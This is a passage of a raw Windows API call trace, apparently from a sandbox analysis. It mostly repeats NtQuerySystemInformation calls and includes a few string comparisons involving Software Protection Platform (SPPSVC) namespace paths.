ResultLength=0x0) [0211.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x38, ResultLength=0x0) [0211.671] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x20, ResultLength=0x0) [0211.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x20, ResultLength=0x0) [0211.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x20, ResultLength=0x0) [0211.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.672] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x50, ResultLength=0x0) [0211.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8f0, Length=0x28, ResultLength=0x0) [0211.673] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0211.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x50, ResultLength=0x0) [0211.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.673] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x50, ResultLength=0x0) [0211.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd970, Length=0x50, ResultLength=0x0) [0211.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.674] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x38, ResultLength=0x0) [0211.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0211.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0211.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.679] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6d0, Length=0x28, ResultLength=0x0) [0211.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd740, Length=0x28, ResultLength=0x0) [0211.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x38, ResultLength=0x0) [0211.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.680] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x28, ResultLength=0x0) [0211.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.920] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x28, ResultLength=0x0) [0211.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x38, ResultLength=0x0) [0211.921] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x20, ResultLength=0x0) [0211.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x20, ResultLength=0x0) [0211.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x20, ResultLength=0x0) [0211.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6a0, Length=0x20, ResultLength=0x0) [0211.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.922] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a0, Length=0x38, ResultLength=0x0) [0211.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd720, Length=0x20, ResultLength=0x0) [0211.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x20, ResultLength=0x0) [0211.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x20, ResultLength=0x0) [0211.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.923] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.924] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb88, Length=0x50, ResultLength=0x0) [0211.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb00, Length=0x28, ResultLength=0x0) [0211.925] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0211.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb88, Length=0x50, ResultLength=0x0) [0211.925] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb88, Length=0x50, ResultLength=0x0) [0211.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x50, ResultLength=0x0) [0211.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9f0, Length=0x28, ResultLength=0x0) [0211.926] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0211.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x50, ResultLength=0x0) [0211.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.926] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x50, ResultLength=0x0) [0211.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fda70, Length=0x50, ResultLength=0x0) [0211.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.927] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x38, ResultLength=0x0) [0211.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x28, ResultLength=0x0) [0211.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.931] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x28, ResultLength=0x0) [0211.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7d0, Length=0x28, ResultLength=0x0) [0211.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.932] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd840, Length=0x28, ResultLength=0x0) [0211.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x38, ResultLength=0x0) [0211.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.933] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x28, ResultLength=0x0) [0211.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.943] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8c0, Length=0x28, ResultLength=0x0) [0211.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x38, ResultLength=0x0) [0211.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd820, Length=0x20, ResultLength=0x0) [0211.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x20, ResultLength=0x0) [0211.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.944] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x20, ResultLength=0x0) [0211.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7a0, Length=0x20, ResultLength=0x0) [0211.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9a0, Length=0x38, ResultLength=0x0) [0211.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd820, Length=0x20, ResultLength=0x0) [0211.945] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0211.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7b0, Length=0x20, ResultLength=0x0) [0211.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.946] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.947] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xf7a67fdad0 | out: lpSystemTimeAsFileTime=0xf7a67fdad0*(dwLowDateTime=0x10b11fdc, dwHighDateTime=0x1d63874)) [0211.947] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdb88, Length=0x50, ResultLength=0x0) [0211.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fdac0, Length=0x28, ResultLength=0x0) [0211.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd9d8, Length=0x50, ResultLength=0x0) [0211.948] GetTickCount () returned 0x11757e6 [0211.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a8, Length=0x58, ResultLength=0x0) [0211.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0211.948] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0212.362] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0212.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0212.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.363] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0212.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5f0, Length=0x28, ResultLength=0x0) [0212.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd660, Length=0x28, ResultLength=0x0) [0212.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.364] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0212.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.365] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x28, ResultLength=0x0) [0212.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.368] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6e0, Length=0x28, ResultLength=0x0) [0212.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0212.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x20, ResultLength=0x0) [0212.369] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0212.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0212.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x20, ResultLength=0x0) [0212.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd7c0, Length=0x38, ResultLength=0x0) [0212.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd640, Length=0x20, ResultLength=0x0) [0212.370] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0212.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5d0, Length=0x20, ResultLength=0x0) [0212.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.371] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd8a8, Length=0x58, ResultLength=0x0) [0212.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.372] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0212.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.375] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.378] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0212.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0212.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0212.379] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd5c0, Length=0x28, ResultLength=0x0) [0212.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd630, Length=0x28, ResultLength=0x0) [0212.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0212.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd780, Length=0x38, ResultLength=0x0) [0212.380] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.381] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x28, ResultLength=0x0) [0212.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.384] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xf7a67fd6b0, Length=0x28, ResultLength=0x0) [0212.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0212.385] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, 